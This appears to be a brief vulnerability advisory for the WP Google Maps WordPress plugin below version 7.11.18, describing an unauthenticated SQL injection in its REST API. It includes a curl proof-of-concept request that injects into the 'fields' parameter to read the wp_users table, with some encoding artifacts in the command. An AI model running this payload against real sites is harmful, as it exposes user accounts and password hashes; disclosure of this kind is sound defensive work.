The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue.
curl -k --silent “http://example.com/index.php?rest_route=3D/wpgmza/v1/markers/&filter;=3D{}&=fields=3D*+from+wp_users+--+-”
CPE | Name | Operator | Version |
---|---|---|---|
wp-google-maps | lt | 7.11.18 |